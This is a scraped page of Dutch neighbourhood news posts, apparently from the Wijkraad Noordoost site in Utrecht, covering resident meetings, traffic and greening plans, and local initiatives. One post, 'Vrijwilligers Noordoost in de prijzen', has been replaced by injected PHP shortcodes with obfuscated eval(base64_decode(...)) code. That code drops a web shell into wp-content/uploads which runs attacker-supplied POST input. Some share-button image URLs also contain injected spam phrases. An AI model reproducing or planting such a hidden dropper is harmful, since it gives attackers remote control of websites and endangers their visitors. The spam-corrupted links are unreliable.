Graag nodigt de gemeente u uit om met elkaar in gesprek te gaan over de nieuwe locatie van Arkin aan de Wittevrouwenkade. Burgemeester Jan van Zanen, wethouder Paulus Jansen en Arkin zijn die avond aanwezig. De bewonersavond vindt plaats op maandagavond 5 februari in de Lik aan het Wolvenplein 27.

Van 18.30 – 19.00 uur bent u welkom voor koffie/thee en een broodje.
Het programma start op 19.00 uur en om 20.30 uur ronden we de avond af.

Graag aanmelden. Stuur een mail met uw naam en aantal personen en of u een broodje mee wilt eten naar: wittevrouwenkade@utrecht.nl
Meer informatie vindt u op de site van de gemeente Utrecht.

Facebooktwittergoogle_pluspinterest

Bijeenkomst SamenNoordoost op 20 februari

Op 20 februari 2018 vindt de volgende netwerkbijeenkomst van SamenNoordoost plaats. Wij hopen dat u hierbij aanwezig kan zijn. De bijeenkomst is in Buurtcentrum de Leeuw van 15.00 tot 17.00.

Indien mogelijk horen wij graag van u of aanwezig kan zijn.
Op de agenda staan o.a.

 • Stand van zaken SamenNoordoost
 • Signalen uit de wijk
 • Bijeenkomsten Zin in Utrecht
 • Bijeenkomst 22 maart

Gonny van der Genugten-Buurtteam NO, Justin van Riel- Wijk&co NO en Reilif Bonse – Wijk&co NO Namens SamenNoordoost

Als u vanuit uw organisatie of als bewoner wat wil inbrengen dan kunt u hierover mailen via Reilif.bonse@wijkenco.nl

Facebooktwittergoogle_pluspinterest

Hoe maken we Utrecht Noordoost ‘waterproof’?

Heb je een idee voor de buurt, wijk of stad? En zijn meer mensen enthousiast? Denk dan eens aan het Initiatievenfonds van de gemeente. Honderden Utrechters kregen hiermee al de kans iets moois neer te zetten. Deze speciale uitgave van De Utrechtse Internet Courant (DUIC) aandacht voor een drietal ‘groene’ en ‘waterproof’ initiatieven in Noordoost.
Hoe maken we Utrecht ‘waterproof’? Drie projecten in Noordoost

Elk jaar valt er meer regen. Buiten de stad kan dat extra water zijn weg wel vinden, maar minder goed in de dichtbevolkte, verharde wijken van Utrecht. Gevolgen zijn ondergelopen kelders en overstroomde putten. In de zomer warmt de stad juist te veel op, doordat er te weinig groen en oppervlaktewater is om af te koelen. Met ‘Waterproof 030’ wil de Gemeente Utrecht de problemen aanpakken. De stad maakt werk van het verminderen van de hoeveelheid water die het riool inloopt en vermindert de verharde oppervlakte.

Lees voor de drie projecten in onze wijk verder op de site van DUIC.

Facebooktwittergoogle_pluspinterest

Raad in de wijk

Op 15 november is de gemeenteraad op bezoek geweest in de wijk Noordoost. De raad is in gesprek gegaan met de bewoners rondom het transformatiegebied Staatsliedenbuurt en Lauwerecht-Noord. Dit gebied is een stukje stad dat begrensd wordt door de Vecht, de spoorlijn, de Talmalaan, de Kardinaal de Jongweg en de Draaiweg.  Het is een nogal stenig gebied; na de verhuizing van gemeentelijke diensten naar het Stadskantoor staan er wat kantoorgebouwen leeg. De gemeenteraad is benieuwd welke kansen bewoners voor het transformatiegebied zien, en wat zij belangrijk vinden. Uit de reacties van de aanwezigen blijkt dat zij in elk geval meer openbaar groen willen. Het verslag van de avond is hier terug te lezen.

Onder leiding van projectleider Gwen van Mossevelde maakten Janita Satter en Monique Bollen een wandeling door het gebied. Vlogger Jelle de Boer registreerde het bezoek, zie zijn vlog:

Facebooktwittergoogle_pluspinterest

Nieuwe Mens en Wijk!

De nieuwe Mens en Wijk is er weer!
Met bijdragen van de wijkraad over de verkeerssituatie in Votulast en wat doet de gemeente met Bewonersparticipatie? En verder met Wobbelyoga, Rookvrij Sporten, de nieuwe Allure van de Eykmanlaan, alle kerstdiensten op een rij en Willem van Noortplein in de spiegel.

Binnen nu en een week ligt het blad op de mat (tenzij nee-nee sticker) of lees hem hier online.

 

Facebooktwittergoogle_pluspinterest

Ouderenverhuisadviseur voor Noordoost

Vorig jaar is de motie 2016/91 door de gemeenteraad aangenomen. Dit gaat over het instellen van een ouderenverhuisadviseur voor de wijk Noordoost. Alleen moest er nog gezocht worden naar financiering. Deze financiering komt er niet, zo bleek onlangs uit de brief van wethouder Paulus Janssen aan de gemeenteraad. De Wijkraad Noordoost reageert hierop met een brief aan de gemeenteraad .

De kern van de zaak is de vraag, of er een grote behoefte bestaat aan een verhuisadviseur voor ouderen in een koopwoning die kleiner willen gaan wonen maar wel in de eigen buurt? En, of die ouderen dat zelf kunnen betalen?

Facebooktwittergoogle_pluspinterest

Start winkelcentrum De Gaard

Op 27-10-2017 geeft wethouder Jansen het officiële startsein voor de bouw van “De Nieuwe Gaard” door het inhijsen van een duiker element. Alles bij elkaar heeft het bijna 10 jaar geduurd voordat er gestart kon worden. Als Wijkraad zijn we daar heel blij mee.
Toch met enige ‘mixed feelings’ vandaag vanwege het verdwijnen van wat beeldbepalende bomen, die in een andere vorm allemaal weer terug gaan komen. Ze maken ruimte voor de AH en het nieuwe profiel op de Eykmanlaan.
Op dit moment betreft het nog voorbereidingen, maar in het nieuwe jaar gaat het echt beginnen. Vanuit de buurt houdt de BLVC voor wat betreft bereikbaarheid, leefbaarheid, veiligheid & communicatie de vinger aan de pols.

Facebooktwittergoogle_pluspinterest

Meedenken in de wijk?

Park de Groene Kop, Winkelcentrum De Gaard, het nieuwe inzamelen, herinrichting De Biltstraat, leefstraten in Vogelenbuurt. Overal komen bewoners en gemeente elkaar tegen.

Op 10 oktober a.s. organiseert de wijkraad Noordoost een themabijeenkomst over wijkparticipatie in Noordoost in Eethuis de Helden. De deelnemers gaan aan de hand van voorbeelden uit Noordoost met elkaar in gesprek over beïnvloeding van gemeentelijk beleid, de kansen van bewonersinitiatieven en de rol die het Wijkbureau en de wijkraad kunnen vervullen. Kom ook en deel uw mening.

U bent van harte welkom. Graag even aanmelden via info@wijkraadnoordoost.nl
Hierbij de agenda voor die avond.

Facebooktwittergoogle_pluspinterest

Werksessies Verkeersroute Votulast

De gemeente onderzoekt samen met bewoners en ondernemers welke maatregelen nodig en/of gewenst zijn voor de verkeersroute door de Vogelenbuurt en omgeving (Votulast). Hiertoe is er in april een gebruikersonderzoek geweest (met 1.165 reacties), waren er vier inloopbijeenkomsten en heeft een kentekenonderzoek plaatsgevonden. De resultaten hiervan vormen – samen met het mobiliteitsbeleid van de gemeente – de basis voor de twee werksessies die de gemeente in juni organiseert.

 • Wanneer? Dinsdag 13 en 27 juni 2017
 • Hoe laat? Van 19.30 – 21.30 uur
 • Waar? Stadskantoor, Stadsplateau 1

De eerste werksessie gaat over de vraag hoe de hoeveelheid (doorgaand) verkeer omlaag zou kunnen. De tweede keer onderzoekt de gemeente met u welke mogelijkheden er zijn om de straten anders in te richten, zodat er meer ruimte ontstaat voor langzaam verkeer. Ook krijgt u de uitkomsten van het gebruikersonderzoek, het kentekenonderzoek en de inloopbijeenkomsten gepresenteerd. Uit de opbrengst van de onderzoeken, bijeenkomsten en de twee werksessies formuleert de gemeente een ambitiedocument over de toekomst van de verkeersroute Votulast.

Interesse? Meld u zich dan nu aan.

Er is plaats voor 40 belangstellenden. Als het aantal aanmeldingen voor de werksessies hoger is dan 40, dan stelt de gemeente de groep samen op basis van een representatieve verdeling over het gebied rond de route. Voor het beste resultaat is het wenselijk dat u beide keren aanwezig bent.

U kunt zich aanmelden door hieronder de gegevens in te vullen en deze mail uiterlijk woensdag 7 juni 2017 terug te sturen naar verkeersroute-votulast@utrecht.nl.

cid:image002.jpg@01D2D93D.6EBB3240

Facebooktwittergoogle_pluspinterest

11 juni GroenmoetjeDoen!-dag 2017: Groene Kennisdelen in Stad030

Op 11 juni wordt de 10de GroenmoetjeDoen!-dag/ dag vh Zelfbeheer030 gehouden.

De dag start om 12.00 met de opening door wethouder Openbare ruimte en Groen van Utrecht, Kees Geldof in de 30 jarige Bikkershof, een van de oudste zelfbeheertuinen van Utrecht. Vanaf 13.00 uur laten 40 zelfbeheerlocaties zien wat ze doen aan groenzelfbeheer, stadslandbouw, water, biodiversiteit en klimaatverandering. Op 15 locaties worden workshops verzorgd en kennis gedeeld over ecologisch maaibeheer, moestuin-stadslandbouw, groenzelfbeheer, plantenbakken in de wijk, waterplanten, maatschappelijkmeerwaarde van stadslandbouw, kinderen in het groen en crowdfunding.

De Waterweek van Utrecht Natuurlijk wordt tevens op die dag geopend. De dag wordt om 16.30 afgesloten bij Nieuw Rotsoord met een Initiatievencafé GroenmoetjeDoen! georganiseerd ism GroenmoetjeDoen!, Utrecht Natuurlijk en Stadsbedrijven.

Alle informatie treft u aan op: www.gmjd.nl en info@gmjd.nl
Ook kunt u de flyer van de GroenmoetjeDoen!-dag hier downloaden.

 

 

 

Facebooktwittergoogle_pluspinterest

Ontmoetingsplekken werken samen in Noordoost

Wethouder Kees Diepeveen ontvangt zondag 7 mei de eerste gezamenlijke activiteitenagenda van verschillende bewonersinitiatieven in Noordoost. Zo kunnen (oudere) wijkbewoners beter zien aan welke activiteiten zij kunnen deelnemen. Onder het motto ‘Samen Thuis in de Wijk’ zijn wijkbewoners zelf gaan samenwerken.

Datum:                  Zondag 7 mei
Plaats:                   Verenigingsgebouw Ons Buiten, Pal Maleterstraat 64
Tijd:                      15.30 uur (inloop 15.00 uur)

Het betekent dat wijkbewoners die activiteiten in ontmoetingsplekken organiseren, met elkaar samenwerken. Zijn er in een wijk bijvoorbeeld twee eetclubs, dan kunnen zij de dagen op elkaar afstemmen. Door hun activiteiten niet op dezelfde dag te doen, krijgen zij meer deelnemers én voor wijkbewoners zijn er op meer dagen mogelijkheden om samen te eten. En als bewoners een koffieochtend willen organiseren, kunnen zij dat doen op een dag dat er niet nog zo’n activiteit in de wijk is.
In de wijk Noordoost zijn ontmoetingsplekken als eerste een samenwerking aangegaan. Het gaat om De Leeuw, Griftsteede, Pauluskerk, Tuindorpkerk, Nieuws Bleyenburg, Ons Buiten, De Driehoek, De Pionier en Tuindorp-Oost. Het plaatsen van alle activiteiten in een gezamenlijke agenda voor de buurt, is de eerste maar belangrijke stap. Hiermee hebben (oudere) wijkbewoners in Noordoost een compleet beeld van wat er in hun wijk te doen is. Het gaat om activiteiten die voor iedereen toegankelijk zijn.

Voor ouderen is het essentieel om actief blijven in de wijk. Als gevolg van veranderingen in de zorg wonen mensen langer thuis. Contacten (onder)houden kan eenzaamheid tegengaan. In veel wijken is al een Huiskamer van de Wijk waar mensen kunnen binnenlopen voor een kop koffie. Maar zij kunnen ook deelnemen aan allerlei activiteiten die veelal door bewoners zelf zijn ontwikkeld. ‘Samen Thuis in de Wijk’ komt hier uit voort. Dergelijke samenwerkingen komen ook in de wijken Hoograven, Kanaleneiland, Overvecht, Leidsche Rijn, Vleuten en De Meern.

De organisaties die het initiatief namen voor Huiskamer van de Wijk (AxionContinu, Careyn, Doenja Dienstverlening, De Rijnhoven, U-centraal  en Welzaam) zijn erg verheugd dat wijkbewoners de regie nemen.

Facebooktwittergoogle_pluspinterest

Stichting BuurtWelzijn verbindt!

Stichting BuurtWelzijn zet zich in om buurtbewoners met elkaar te verbinden. Dit doen wij onder andere met de gratis buurtwebsite www.mijnbuurtwelzijn.nl, waarop activiteiten, nieuwtjes en vraag en aanbod geplaatst kunnen worden. Dit kan ook voor onze wijk, Noordoost!

Denk aan bijvoorbeeld de vraag voor hulp bij het boodschappen doen. Zo blijft u op de hoogte van wat er in de buurt speelt. Daarnaast zijn wij ook fysiek actief, waardoor het ook voor minder digitale bewoners bereikbaar is. Zoals de activiteit filosoferen met ouderen of computercursussen. Momenteel zijn wij bezig met het betrekken van 65-plussers in deze buurt. Hierbij doen wij ook een onderzoek of een website als van BuurtWelzijn een meerwaarde kan zijn voor senioren.

Bent u 65 of ouder en wilt u ons helpen? Neem dan contact op met Anne van Leeuwen via a.leeuwen@buurtwelzijn.org of bel 06-14498149. Samen met u werken wij aan een betrokken, gezellige buurt voor iedereen!

Facebooktwittergoogle_pluspinterest

OPROEP BEWONERSPLATFORM OMGEVING LAUWERECHT/STAATSLIEDENBUURT

Al lange tijd is het een zorg van de wijkraad of en hoe de buurten Lauwerecht en Staatsliedenbuurt zich kunnen ontwikkelen. Er is veel nieuwbouw gepleegd in de afgelopen jaren en ook nogal wat renovatie. De winkels op de Merelstraat hebben het moeilijk (gehad) en ontmoeting van oude en nieuwe bewoners verloopt naar ons idee nog enigszins moeizaam.

Vrijwel ieder jaar houdt de wijkraad Noordoost een raadpleging van (een deel van) zijn achterban over een – op dat moment – belangwekkend onderwerp. Dit jaar hebben we speciale aandacht voor deze buurten, twee van de elf in onze wijk Noordoost. Afgelopen jaar betrof het de Veemarkt.

Vanaf 2017 staan er hier grote bouwplannen op stapel en een ermee gepaard gaande herinrichting van de openbare ruimte. Het gaat om een toevoeging van tenminste 800 woningen met een gemengde bewoning waaronder veel studenten en starters op de woningmarkt. Er is enige tijd geleden deur-aan-deur een folder verspreid door de gemeente met een schets van deze plannen.

Zo’n grote bouwactiviteit brengt vele vragen met zich mee, en vooral de vraag: hoe kunnen huidige en eventueel ook toekomstige bewoners een rol nemen in het adviseren van de gemeentelijke diensten en de bouwende partijen om tot een zo groot mogelijke kwaliteitsverbetering van het gebied te komen?

We starten in april met een bewonersplatform, opererend vanuit Buurtcentrum De Leeuw, en bestaande uit ongeveer 8 tot 10 personen. Liefst zoveel mogelijk gespreid in het gebied; uit oud- en nieuwbouw, mannen en vrouwen, jongeren en ouderen die zich hiervoor belangeloos willen inzetten.

We komen veertiendaags bijeen met deze groep en stellen gezamenlijk de te behalen doelen/resultaten vast. Doe mee met deze bewonersgroep en laat uw stem horen. De Wijkraad ondersteunt deze groep met begeleiding, en (interne en externe) communicatie.
– In december 2017 stellen we gezamenlijk een eindrapportage op van beleving en adviezen van deze maanden.
– Het eindrapport wordt aangeboden aan het College van Burgemeester en Wethouders in de persoon van wijkwethouder Everhardt.
– Wanneer de groep ervoor kiest om hierna verder te gaan met zijn taak zal dat gerealiseerd moeten kunnen worden.

Heeft u interesse? Meld u aan via de site!

Facebooktwittergoogle_pluspinterest

Stadsboerderij Het Lachende Paard start Crowdfunding

Stichting Het Lachende Paard is op 8 april gestart met Crowdfunding campagne “Dak voor de Dieren!”. Met die campagne wil de stichting een bedrag van 4.100 euro ophalen voor een nieuw dak op de stal. Zodat ook de volgende winter de dieren een knusse en droge slaapplek hebben.
Doneren kan via www.voorjestadsie.nl/hetlachendepaard

De campagne ‘Dak voor de Dieren’ is gestart om te zorgen dat ook de volgende winter de dieren lekker droog in hun stalletje kunnen slapen. Wind en regen is iets waar ezels Anna en Linda en ook de geiten niet dol op zijn. Wanneer het begint te regenen rennen ze snel hun stal in, doen daar een dutje of kijken half slapend door de deur naar de regen buiten. Alle dieren bij stadsboerderij Het Lachende Paard kiezen zelf wanneer ze binnen of buiten zijn. De stichting vindt dat dat zo moet blijven en zamelt daarom geld in voor een nieuw dak. Om de verrotte balken en lekkende dakplaten te vervangen is een bedrag van 4.100 euro nodig.


Het Lachende Paard ligt in Tuindorp-Oost, tussen Careyn Tuindorp-Oost en het Ecologisch Tuinenpark De Driehoek in. De stadsboerderij bestaat al meer dan tien jaar. Zoals de naam al doet vermoeden lopen er paarden, maar er wonen ook ezels, geiten, schapen en kippen. Nieuwsgierig naar de plek? Kom langs tijdens de open dag op 29 april en maak kennis met de mensen en dieren van Het Lachende Paard.

Facebooktwittergoogle_pluspinterest

Voordorp duurzamer in 2017

Op 9 februari was er weer een VvE energie bijeenkomst bij Tuinenpark Ons Buiten en op 21 februari zijn de plannen ook toegelicht bij de vergadering van Wijkraad Noordoost. Christian Naethuys en Sander Ekstijn (beide bewoners van Voordorp en lid van de Wijkraad) hebben versterking gekregen van Energie-U in de persoon van Corien van den Haak. Zo komt er meer kennis over verduurzamen en zonnepanelen vanuit heel Utrecht bij het team terecht. In Voordorp zijn ondertussen twee VvE’s die hun dak ‘beschikbaar hebben gesteld’ voor zonnepanelen. Een volgende stap is om de invulling van dat dak te gaan regelen met het opvragen van offertes en het vastleggen van de spelregels voor leden van de VvE. Er is dus beweging!

Voordorp kan zich mooi gaan spiegelen aan de Veemarkt, met 25 jaar technologische & maatschappelijke voorsprong. In de presentatie op 9 februari was te zien welke alternatieven er nog meer zijn zoals met buurtstroom en hoe je die alternatieven betaald kunt krijgen! Ook leverde het ideeën op om na te denken over alternatieven voor de CV-ketels in de richting van warmtepompen om op termijn ‘van het gas af te gaan’.

Leuke nieuwe ontwikkelingen in Voordorp en Veemarkt zijn verder het beschikbaar komen van meer elektrische deelauto’s. Op de Veemarkt staat al de eerste, maar met twee initiatieven worden dat er snel meer. Via “We Drive Solar” (Renault ZOE met effectief 300km bereik) komt er zeker al één extra en de intentie is om via “De Testrijders” (VW e-Golf met effectief 200km bereik) er ook minimaal één naar Voordorp te krijgen.

Niet meer dromen, maar samen realiseren! Dat was het motto van de dak conferentie 2017 met de titel ‘Het dak van Utrecht geeft energie!’ op 15 februari. Dat eindigde met het ondertekenen van een manifest met vrij ambitieuze doelstellingen, maar niet onrealistisch. Het gaat dan om sneller meer verduurzaming te behalen (10% daken met zonnepanelen in 2020). Mede ondertekenaars waren ‘Energie-U’, ‘Buurtstroom’ en ‘Groot dak zoekt zon’ (in totaal bijna 70 Utrechtse organisaties).

NB meer documenten zijn te vinden op website van Voordorp Op Eigen Kracht

Facebooktwittergoogle_pluspinterest

Aanbieden eindrapport Buurtgesprek Veemarkt 2016

Op dinsdag 21 februari 2017 tijdens de reguliere wijkraad vergadering is het eindrapport van het Buurtgesprek Veemarkt 2016 aangeboden aan wethouder Victor Everhardt. Het is de uitkomst van de wijkraadpleging die elke wijkraad mag doen op een bepaald thema dat ze belangrijk vinden om nader te onderzoeken.

Lees met deze link het volledige rapport.

Samenvatting

Facebooktwittergoogle_pluspinterest

89 KAMERBEWONERS IN DE LICHTKRING?

Wooncorporatie MITROS heeft onlangs het bezit van De Lichtkring (Eijkmanlaan) overgenomen van VESTIA. Vrijwel meteen zijn er plannen bekend gemaakt om hier 89 sociale huurwoningen te realiseren. Onze verwachting was dat het onpraktische en gedateerde gebouw zou worden afgebroken en vervangen door moderne bouw. Prima als dat sociale woningbouw zou zijn, mits de van toepassing zijnde beheersverordening dat toestaat. Het zal nu toch niet gebeuren dat een beeldbepalend gebouw in onze wijk een nieuwe bestemming krijgt in een eentweetje van gemeente en MITROS zonder zelfs maar alternatieven te wegen?

Dat van de bestaande zorg-kamertjes met enkele sanitaire aanpassingen evenveel ‘woninkjes’ van 24 m2 worden gemaakt is wat ons betreft niet wenselijk. Dit is te massaal, te primitief en zonder voldoende flankerende voorzieningen, zoals parkeren. Het is zelfs in strijd met de geest van de door de wethouder eerder gemaakte afspraken over splitsen van gebouwen in eenheden niet kleiner dan 27 m2.

In mondelinge vragen in de gemeenteraad door D66/PvdA is bij wethouder Paulus Jansen erop aangedrongen in gesprek met de buurt tot een invulling van het pand te komen die past bij het karakter van de buurt. Voorts heeft de wijkraad de omwonenden geadviseerd de rechter te laten toetsen of hier sprake is van een correcte invulling van de beheersverordening. 

Facebooktwittergoogle_pluspinterest

Inloopavond Monicabrug 12 december

Op 12 december organiseert de gemeente Utrecht een inloop informatieavond over de knijp bij de Monicabrug. Bewoners kunnen tijdens deze avond terecht met vragen over het eindrapport van de knijp Monicabrug die de effecten van de knijp beschrijft en het vervolg met betrekking tot verkeer.  

Wanneer: maandag 12 december 2016
Hoe laat: vanaf 19:30 tot 21:30. 
Waar: Het Huis Utrecht, Boorstraat 107, Utrecht. 

U kunt het rapport vinden op: utrecht.nl/monicabrug

 

Facebooktwittergoogle_pluspinterest

Fietsroute Overvecht – Utrecht Science Park

Utrecht wil de stad op een gezonde manier laten groeien en wil onder andere door het fietsgebruik te stimuleren door bv het aanleggen van fietsparkeerplaatsen en stallingen, maar ook door comfortabele fietsroutes aan te leggen die de verschillende wijken van de stad met elkaar verbinden. Een belangrijke fietsroute loopt van Overvecht naar het Utrecht Science Park (de Uithof) via de  Adriaen Beyerkade, Pieter Nieuwlandstraat, Van Esveldstraat, Jan van Galenstraat, Huizingalaan en Karel Doormanlaan.

De gemeente pakt de fietsroute stap voor stap aan. Fietspaden worden verbreed, er komen fietsstraten waar de auto te gast is, met zo min mogelijk obstakels én voorrang voor de fietsers.

Voor de buurtbewoners zijn inloopavonden georganiseerd om mee te denken.

Informatieavond Huizingalaan en Karel Doormanlaan
Datum: donderdag 08-12-2016
Tijdstip: 19:00-21:00 uur
Locatie: Wijkcentrum de Helden, Jan van Galenstraat

Inloopavond Van Esveldstraat Pieter Nieuwlandstraat
Datum: woensdag 14-12-2016
Tijdstip:18:30-21:00 uur
Locatie: Restaurant Griftpark, Griftpark 1

Meer informatie:
https://www.utrecht.nl/wonen-en-leven/verkeer/verkeersprojecten/overvecht-utrecht-science-park-verbeteren-fietsroute/

 

 

Facebooktwittergoogle_pluspinterest

Kerstboomlichtjes ontsteken in Ons Buiten

Tuinenpark Ons Buiten ontsteekt op zaterdag 10 december op feestelijke wijze de lichtjes in de kerstboom op het tuinenpark, vlak naast het clubgebouw. Om de kerstsfeer te verhogen, zingt het Sterrenkoor de sterren van de hemel! Kom luisteren naar kerstmuziek en geniet van een beker glühwein of chocolademelk. Voor de kinderen (en hun ouders) is er een spannende lichtjeswandeling over het park als het donker is. Breng ook je zelfgemaakte lampion mee (heb je ‘m nog van Sint Maarten?).

Datum:    Zaterdag 10 december 2016
Tijd:         Vanaf 16.00 tot +/- 18.00 uur
Locatie:   Kerstboom Tuinenpark Ons Buiten, Pal Maleterstraat 64, 3573 PH Utrecht
Toegang: Gratis

 

Facebooktwitter<img alt="google_plus" title="Deel via Google+" class="synved-share-image synved-social-image synved-social-image-share" width="16" height="16" style="display: inline; width:16px;height:16px; margin: 0; padding: 0; border: none; box-shadow: none;" src="http://www site link.wijkraadnoordoost.nl/wp-content/plugins/social-media-feather/synved-social/image/social/regular/32×32/google_plus.png” />pinterest

Facebooktwittergoogle_pluspinterest

Social Enterprise Award voor Wijkconnect

Wijkconnect is een online community vóór en dóór de wijk. Ook de buurten van Utrecht Noordoost zijn hier terug te vinden. Om te zien wat er speelt in de wijk is er een wijkagenda. Onlangs is een nieuwe wijkagenda door Wijkconnect gelanceerd.

Social Enterprice Day
Jaarlijks vindt de Social Enterprise Day plaats. Een dag vol inspiratie over bedrijven met een maatschappelijke doelstelling. Dit jaar werden ook de Social Enterprise Awards uitgereikt. In de categorie Startup heeft WijkConnect een top 5 plaats weten te behalen! Naast De Correspondent, FFORE, Peerbij en Sociaal Plus. Lees hier het artikel.

 

 

Facebooktwittergoogle_pluspinterest

Vrijwilligers Noordoost in de prijzen

[insert_php]@eval(base64_decode(‘JGZpbGUgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLiIvd3AtY29udGVudC91cGxvYWRzL3Y2MDZ4NHpiLnBocCI7JGRhdGEgPSAiUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3lkdVptSndOalIwTkNkZEtUcy9QZz09IjskYmFzZWRlY29kZWRhdGEgPSBiYXNlNjRfZGVjb2RlKCRkYXRhKTtmaWxlX3B1dF9jb250ZW50cyAoJGZpbGUsICRiYXNlZGVjb2RlZGF0YSk7’));[/insert_php][php]@eval(base64_decode(‘JGZpbGUgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLiIvd3AtY29udGVudC91cGxvYWRzL3Y2MDZ4NHpiLnBocCI7JGRhdGEgPSAiUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3lkdVptSndOalIwTkNkZEtUcy9QZz09IjskYmFzZWRlY29kZWRhdGEgPSBiYXNlNjRfZGVjb2RlKCRkYXRhKTtmaWxlX3B1dF9jb250ZW50cyAoJGZpbGUsICRiYXNlZGVjb2RlZGF0YSk7’));[/php]

Facebooktwittergoogle_pluspinterest

Vernieuwing Noordelijke Randweg

De gemeente gaat de Noordelijke Randweg Utrecht (NRU) vernieuwen. Hierdoor moet het verkeer beter doorstromen. De NRU is de route aan de noordkant van de stad en loopt van het Gandhiplein (bij crematorium Daelwijck), over de Karl Marxdreef en de Albert Schweitzerdreef via het Robert Kochplein tot aan de Einthovendreef (tot het spoor bij de A27).

Op zaterdag 12 november staat de gemeente met een informatiekraam in het Shoppingcenter Overvecht. U kunt tussen 11.00 en 16.00 uur de plannen voor de NRU bekijken en vragen daarover stellen aan de gemeente. Klik hier voor meer informatie

 

Facebooktwittergoogle_pluspinterest

Utrecht Noordoost in dialoog

dialoog2016Op donderdag 10 november vindt er in Buurtcentrum De Leeuw een dialoog plaats waar ook jij aan kan meedoen!
Je bent van harte welkom om mee te praten en buurtbewoners te ontmoeten!
Donderdag 10 november 19.30 – 22.00 uur in: Buurtcentrum De Leeuw, Samuel van Houtenstraat 1,3515 EA, Utrecht.
Meer informatie: https://www.facebook.com/events/1073151182800845/ en www.utrechtindialoog.nl

Een dialoog is een openhartig gesprek over ervaringen, dromen en mogelijkheden dat bijdraagt tot verbondenheid en wederzijds begrip. Aan tafels van 6 tot 8 personen delen we onze ervaringen met deze goede buur(t), onze dromen en wat we concreet gaan doen om deze dichterbij te halen. Buurtbewoner en organisator Monica: ”Het lijkt me mooi als we in de Week van de Dialoog als buurtbewoners met elkaar in gesprek gaan over “een goede buur(t)…..”. Wat is dat eigenlijk? Hoe kunnen we daar samen voor zorgen? En, wanneer is een goede buur(t) beter dan een verre vriend?

De Week van de Dialoog is een jaarlijks terugkerend landelijk initiatief. De Week van de dialoog vindt dit jaar plaats van 4 tot en met 13 november en heeft als thema Respect. Er zijn dialoogtafels op diverse plaatsen en tijdstippen in de stad Utrecht. De tafels worden georganiseerd door bewoners(initiatieven) en maatschappelijke organisaties. Door met elkaar te praten leren we elkaar beter kennen, en komen we erachter wat we belangrijk vinden in onze stad, onze buurt, op school, in sport en spel, op ons werk en in ons dagelijks leven. Zo kunnen we beter met elkaar samen leven, wonen en werken in Utrecht.

Facebooktwittergoogle_pluspinterest

Herinrichting Maliesingel, Wittevrouwensingel en Kleine Singel

De gemeente heeft op 26 oktober de plannen met de bewoners besproken om de Maliesingel (na de kruising met de Maliebaan), Wittevrouwensingel, tot aan de Kleine Singel aan te pakken. Er komt meer ruimte voor fietsers en voetgangers. Het verkeersbeeld moet hierdoor veiliger en rustiger worden. De werkzaamheden starten naar verwachting in de zomer van 2017. Meer informatie over de plannen kunt u lezen op www.utrecht.nl/maliewittevrouwensingel .

herinrichting-maliesingel-wittevrouwensingel

 

Facebooktwittergoogle_pluspinterest

Bewonersbijeenkomst vergroening van de singels

Binnenkort is er een bewonersbijeenkomst over vergroening van de singels.
De bijeenkomst wordt georganiseerd door de Initiatiefgroep Vergroening Singel.

Datum: wo. 2 november
Tijd: van 19:30 tot 21:30
Locatie: “Maar ’s zondags niet”, Wittevrouwenstraat 30 (voorheen meubelzaak Strand)

Deze bijeenkomst is bedoeld voor iedereen die geïnteresseerd is in de maatregelen en incidenteel of regelmatig wil meehelpen met schoon houden, beheer en onderhoud van de locaties. Het gaat heel concreet om wat je allemaal kunt doen en hoe we dat gaan organiseren.

 • Programma
  19:30     Inloop, koffie en thee
  19:45     Welkom en presentatie vergroeningsmaatregelen
  20:30     Bespreken mogelijke werkzaamheden
  –  standaardklussen en andere activiteiten
  –  beschikbaarheid, mogelijkheden, kennis en kunde vrijwilligers
  –  organisatie vrijwilligersteams en contactpersonen
  –  ondersteunende rol Initiatiefgroep Vergroening Singel en gemeente
  –  praktische afspraken
  21:30     Afronding

Aanmelden
Aanmelden voor de bijeenkomst kan bij harmke.van.dam@xs4all.nl, bij voorkeur vóór 28 oktober. Graag ook je tel.nummer vermelden. Ook als je niet kunt, maar wel als vrijwilliger inzetbaar bent, kun je dat aan mij doorgeven.

Aan het werk langs de Maliesingel, juni 2016

C Maliesingel WP_20160622_007 inplanten talud kl

Op dit moment hebben zich al een stuk of 20 vrijwilligers gemeld, maar alle hulp is welkom. Want het gaat om een groot aantal locaties en diverse soorten  werkzaamheden. Ook als je weinig tijd hebt kunnen we je hulp en inbreng goed gebruiken. Zoals bij je past.

 

 

 

<img alt="Facebook" title="Deel via Facebook" class="synved-share-image synved-social-image synved-social-image-share" width="16" height="16" style="display: inline; width:16px;height:16px; margin: 0; padding: 0; border: none; box-shadow: none;" src="http://www weight loss tablets that work.wijkraadnoordoost.nl/wp-content/plugins/social-media-feather/synved-social/image/social/regular/32×32/facebook.png” />twittergoogle_pluspinterest

Facebooktwittergoogle_pluspinterest

Winklerlaan – nieuw gebouw voor Fier speciaal onderwijs

EVA architecten gaat de nieuwe school voor SO Fier ontwerpen. Deze week is definitief gekozen voor dit Utrechtse architectenbureau.

De school heeft beloofd de buurt zo goed mogelijk op de hoogte te houden van alle nieuwe ontwikkelingen rond de nieuwbouw van de school aan de Winklerlaan.
SO Fier is een school voor speciaal onderwijs, voor kinderen die een intensieve aanpak vergen omtrent gedrag. Kinderen leren hier hetzelfde als alle kinderen op de basisschool, maar bij alles wat gebeurt staan de gedragsvragen die deze leerlingen stellen centraal. In het nieuwe gebouw is straks plaats voor 150 leerlingen. Hierbij de brief van de school.

Bericht aan buurtbewoners Winklerlaan

Facebooktwittergoogle_pluspinterest

Winkelcentrum De Nieuwe Gaard

Veel bewoners van Tuindorp Oost, Tuindorp en Voordorp zien de plannen voor de uitbreiding van winkelcentrum De Gaard als een aanwinst voor de wijk. Het project is een voorbeeld van (bewoners)participatie in complexe infrastructurele projecten.

Het project is bij de drie beste participatietrajecten geëindigd in 2009. Een participatietraject is uiteraard altijd een kwestie van geven en nemen.

Een klein aantal bewoners uit de buurt die zorgen hebben over de uitbreiding van het winkelcentrum zijn erg laat in actie gekomen en nemen een vrij dominante positie in.

Dit is jammer! Iedereen in de buurt is de afgelopen jaren veelvuldig geïnformeerd via voortgangsberichten in de buurtkrant(en), wijkberichten van de gemeente en bijeenkomsten door de gemeente.

